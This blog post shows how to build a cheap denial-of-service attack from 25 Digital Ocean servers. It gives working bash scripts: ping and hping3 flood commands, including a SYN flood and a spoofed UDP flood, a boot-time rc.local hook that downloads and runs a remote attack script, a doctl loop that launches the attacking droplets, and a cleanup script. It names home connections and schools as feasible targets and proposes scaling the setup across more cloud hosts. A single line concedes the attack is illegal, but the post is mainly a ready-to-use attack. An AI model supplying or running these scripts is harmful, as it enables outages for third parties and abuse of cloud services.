The Explanation
So this has been a topic I’ve thought about a lot. We were all 13 year-olds once playing around with Low Orbit Ion Cannon, thinking it actually did something. But for someone, even a kid, on a budget of next to nothing, how do you actually pull off a strong denial of service attack?
I recently started using VPS hosts, particularly Digital Ocean (of which this post will highlight). A virtual private server (VPS) is an isolated environment (typically running Linux, though you can purchase Windows VPS’s from other providers, like AWS) that you can use to do whatever you want, from running high-speed game servers to websites and databases. But with my minimal Linux programming knowledge, I started thinking… what else can I do with this? See, most of these VPS hosts allow you to create templates, a small image with pre-configured settings and programs installed so that you barely had to do any work when you spun up a new server. Digital Ocean called them “Snapshots”
So I got to work, haphazardly writing my spaghetti-code. Finally, I got a decent setup. This is how it worked:
The Technical
TL;DR – I made a template on Digital Ocean that, upon bootup, downloaded a script from my website and ran it. That script just so happened to use hping3 to flood a specific target with TCP SYN packets. I started 25 Digital Ocean servers under this template. Since each server only cost $0.007 an hour to run, this attack only cost about $0.18 an hour to run.
So Digital Ocean allows you to create up to 25 servers (referred to as “Droplets”) at a time. But given that each droplet is connected to a shared 1 Gb ethernet switch, this isn’t small. Now, you’re not going to be taking Facebook offline, but it’s more than enough to take out most residential connections, and some schools.
First, I made a template. It was very simple: in /etc/rc.local (a script that runs upon bootup), there was a wget command that downloaded a script from my website and ran it. The idea was that I build the script to use a program to launch as much traffic as possible at a target.
Cool! Now I just need to build the script. If you wanted this to be fancy, you could do what I did. I built a bunch of PHP scripts that asked you exactly how you wanted the attack to be carried out: what IP address to attack, what ports to use, what data to send, etc etc. It then compiled the bash script to meet my parameters and set it on the web server, ready to be picked up by the eager Droplets. Or you can just write the script once, put in on the web server, and SSH in to change the IP address in the script as necessary.
#!/bin/bash
# These are a few working examples of commands that would flood ${TARGET} with data
#Basic IPv4 Ping
ping -s 65500 -f ${TARGET}
#Basic IPv6 Ping
ping6 -s 65500 -f ${TARGET}
#TCP SYN Flood
hping3 --flood -S -p ${PORT} ${TARGET}
#UDP Spoofed Flood
hping3 --flood --spoof 1.1.1.1 --udp -p ${PORT} ${TARGET}
Nice, now the script is all set and ready to be shipped off. Now, we can either take the manual approach, and sign into Digital Ocean to launch 25 droplets under that template we made earlier (which, to give credit to Digital Ocean, is relatively easy and can be done pretty fast) OR we could automate it! Digital Ocean made a command-line tool called doctl. So now all we need is a script to automate the launch of 25 droplets under that template. We’ll give them IPv6 addresses too, because it’s free and we may need to attack an IPv6 target. Easy enough:
#!/bin/bash
for i in {1..25}; do doctl compute droplet create Attacker --enable-ipv6 --size 1gb --image [INSERT SNAPSHOT ID HERE] --region nyc3; done
You’ll need to find out what the ID of the template you made was. That can be done simply with:
# doctl compute snapshot list
I put that creation command in a script because it’s really long, especially if you want to authorize an SSH key for access. But that’s about it. Run that script, and 25 droplets in a datacenter somewhere (in this case, New York, but you may want to change that depending on where your target is; closer is better) will start up, download that DDoS script from your server, and start hammering away at whatever target you specified in the script.
When you want to stop, just delete the droplets. This can be a pain, because Digital Ocean doesn’t like to mass-delete droplets. So I build this script to delete all droplets under the name “Attacker”. It’s not perfect, but it works with doctl version 1.13.0:
#!/bin/bash
attackercount=$(/usr/bin/sudo /usr/local/bin/doctl compute droplet list | grep Attacker | wc -l)
if [[ ${attackercount} = 0 ]]; then
echo "There are no droplets named 'Attacker'"
exit
fi
if [[ ${attackercount} > 1 ]]; then
ids=$(doctl compute droplet list | grep Attacker | sed 's/ .*//' | tr '\r\n' ' ')
doctl compute droplet delete ${ids} -f
else
doctl compute droplet delete Attacker -f
fi
In Review
That’s really all you need. It’s not hard at all. Kinda scary, isn’t it? For just $0.18 an hour, you can launch a pretty decent DDoS attack.
I’d like to point out the obvious here: even if this were legal, (which, in case you weren’t in the loop, this is very illegal) it still violates Digital Ocean’s terms of use and your account could be suspended.
But it’s a proof-of-concept, so. Y’know. Take that as you will.
My setup is a bit more involved. You can get pretty creative with it. Set up a whole web portal with PHP scripts that compile your bash scripts, select your target, even specify how many droplets to create. And that’s just assuming you use Digital Ocean. With AWS Spot Fleet, you could make this way more powerful and elaborate. You could write a program backed by several APIs to leverage Digital Ocean, Vultr, AWS, and virtually any other VPS host you could think of. The possibilities are endless.